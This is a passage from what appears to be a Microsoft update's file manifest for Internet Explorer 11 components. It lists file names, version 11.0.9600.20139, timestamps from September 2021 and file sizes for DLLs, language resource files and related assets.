\nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 67,584 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 67,584 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 74,240 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 78,848 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 61,440 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 74,752 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 62,464 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 68,096 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 75,264 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 65,536 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 72,192 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 73,216 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 37,888 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 67,584 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 65,536 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 74,240 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 70,656 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 71,168 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 71,680 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 71,168 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 69,632 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 68,096 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 59,904 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 65,536 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 69,120 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 29,696 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 30,720 \nF12Resources.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.20139| 13-Sep-2021| 21:12| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.20139| 13-Sep-2021| 21:14| 276,480 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:09| 46,080 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 50,176 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 49,664 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 51,712 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 54,272 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 48,128 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 50,176 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 47,616 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 49,152 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 50,688 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 45,056 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 49,152 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 49,152 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 49,664 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 39,936 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 39,424 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 47,616 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 47,616 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 51,200 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 50,688 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 49,664 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 50,176 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 49,152 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 50,176 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 49,664 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 48,128 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 49,152 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 48,128 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 35,328 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 35,328 \nurlmon.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:32| 35,328 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:09| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 11,264 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 9,216 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 7,680 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 7,680 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 10,752 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 9,728 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 10,240 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 6,656 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 6,656 \noccache.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 6,656 \nwininet.dll| 11.0.9600.20139| 13-Sep-2021| 20:59| 4,858,880 \njsproxy.dll| 11.0.9600.20139| 13-Sep-2021| 21:30| 54,784 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 73,728 \niedkcs32.dll| 18.0.9600.20139| 14-Sep-2021| 14:08| 390,536 \ninstall.ins| Not versioned| 13-Sep-2021| 19:04| 464 \nieapfltr.dat| 10.0.9301.0| 24-Feb-2021| 23:18| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:28| 800,768 \ntdc.ocx| 11.0.9600.20139| 13-Sep-2021| 21:12| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20139| 13-Sep-2021| 21:39| 666,624 \niedvtool.dll| 11.0.9600.20139| 13-Sep-2021| 22:17| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.20139| 13-Sep-2021| 21:41| 50,176 \ndxtmsft.dll| 11.0.9600.20139| 13-Sep-2021| 21:17| 491,008 \ndxtrans.dll| 11.0.9600.20139| 13-Sep-2021| 21:06| 316,416 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 13-Sep-2021| 19:03| 11,892 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:09| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 3,584 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 3,584 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 4,096 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 3,584 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 3,584 \nF12.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20139| 13-Sep-2021| 21:16| 245,248 \nF12Resources.dll| 11.0.9600.20139| 13-Sep-2021| 21:44| 10,949,120 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:31| 2,048 \nF12Tools.dll| 11.0.9600.20139| 13-Sep-2021| 21:15| 372,224 \nF12.dll| 11.0.9600.20139| 13-Sep-2021| 21:03| 1,422,848 \nmsfeeds.dll| 11.0.9600.20139| 13-Sep-2021| 20:56| 809,472 \nmsfeeds.mof| Not versioned| 13-Sep-2021| 19:16| 1,518 \nmsfeedsbs.mof| Not versioned| 13-Sep-2021| 19:16| 1,574 \nmsfeedsbs.dll| 11.0.9600.20139| 13-Sep-2021| 21:08| 60,416 \nmsfeedssync.exe| 11.0.9600.20139| 13-Sep-2021| 21:37| 13,312 \nhtml.iec| 2019.0.0.20139| 13-Sep-2021| 21:36| 417,280 \nmshtmled.dll| 11.0.9600.20139| 13-Sep-2021| 21:08| 92,672 \nmshtmlmedia.dll| 11.0.9600.20139| 13-Sep-2021| 20:55| 1,359,872 \nmshtml.dll| 11.0.9600.20139| 13-Sep-2021| 22:16| 25,760,256 \nmshtml.tlb| 11.0.9600.20139| 13-Sep-2021| 21:48| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 13-Sep-2021| 19:03| 3,228 \nieetwcollector.exe| 11.0.9600.20139| 13-Sep-2021| 21:26| 116,224 \nieetwproxystub.dll| 11.0.9600.20139| 13-Sep-2021| 21:36| 48,640 \nieetwcollectorres.dll| 11.0.9600.20139| 13-Sep-2021| 21:48| 4,096 \nielowutil.exe| 11.0.9600.20139| 13-Sep-2021| 21:28| 222,720 \nieproxy.dll| 11.0.9600.20139| 13-Sep-2021| 20:26| 870,400 \nIEShims.dll| 11.0.9600.20139| 13-Sep-2021| 20:32| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 24-Feb-2021| 23:33| 85,548 \nWindows Information Bar.wav| Not versioned| 24-Feb-2021| 23:33| 23,308 \nWindows Feed Discovered.wav| Not versioned| 24-Feb-2021| 23:33| 19,884 \nWindows Navigation Start.wav| Not versioned| 24-Feb-2021| 23:33| 11,340 \nbing.ico| Not versioned| 24-Feb-2021| 23:26| 5,430 \nieUnatt.exe| 11.0.9600.20139| 13-Sep-2021| 21:26| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 14-Sep-2021| 15:29| 2,956 \njsprofilerui.dll| 11.0.9600.20139| 13-Sep-2021| 21:09| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.20139| 13-Sep-2021| 21:24| 1,862,656 \nMshtmlDac.dll| 11.0.9600.20139| 13-Sep-2021| 21:35| 88,064 \nnetworkinspection.dll| 11.0.9600.20139| 13-Sep-2021| 21:04| 1,217,024 \noccache.dll| 11.0.9600.20139| 13-Sep-2021| 21:05| 152,064 \ndesktop.ini| Not versioned| 24-Feb-2021| 23:21| 65 \nwebcheck.dll| 11.0.9600.20139| 13-Sep-2021| 20:58| 262,144 \ndesktop.ini| Not versioned| 24-Feb-2021| 23:21| 65 \nmsrating.dll| 11.0.9600.20139| 13-Sep-2021| 21:09| 199,680 \nicrav03.rat| Not versioned| 24-Feb-2021| 23:21| 8,798 \nticrf.rat| Not versioned| 24-Feb-2021| 23:21| 1,988 \niertutil.dll| 11.0.9600.20139| 13-Sep-2021| 21:43| 2,916,864 \nsqmapi.dll| 6.2.9200.16384| 14-Sep-2021| 14:08| 286,088 \nie4uinit.exe| 11.0.9600.20139| 13-Sep-2021| 20:56| 728,064 \niernonce.dll| 11.0.9600.20139| 13-Sep-2021| 21:29| 34,304 \niesetup.dll| 11.0.9600.20139| 13-Sep-2021| 21:36| 66,560 \nieuinit.inf| Not versioned| 13-Sep-2021| 20:06| 16,303 \ninseng.dll| 11.0.9600.20139| 13-Sep-2021| 21:11| 107,520 \nTimeline.dll| 11.0.9600.20139| 13-Sep-2021| 21:11| 219,648 \nTimeline_is.dll| 11.0.9600.20139| 13-Sep-2021| 21:29| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Feb-2021| 23:21| 3,197 \nVGX.dll| 11.0.9600.20139| 13-Sep-2021| 21:08| 1,018,880 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 2,066,432 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:09| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 2,121,216 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:10| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 2,075,648 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 2,063,872 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:11| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 2,314,240 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 2,390,528 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:12| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 2,033,152 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 15:30| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 2,307,584 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:13| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 2,255,872 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 2,061,312 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:14| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 2,326,016 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:15| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 2,019,840 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 2,071,040 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:16| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 2,082,816 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:17| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 2,307,584 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 2,170,368 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:18| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 2,153,984 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:19| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 2,291,712 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 2,283,520 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:20| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 2,052,096 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:21| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 2,301,952 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 2,093,056 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:22| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 2,075,648 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:23| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 2,299,392 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 2,094,592 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:24| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 2,316,800 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 2,305,536 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:25| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 2,278,912 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:26| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 2,285,568 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 3,584 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 2,060,288 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:27| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 2,315,776 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:28| 3,072 \nieframe.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 2,279,424 \nieui.dll.mui| 11.0.9600.20139| 14-Sep-2021| 14:29| 3,072 \nieframe.dll.mui| 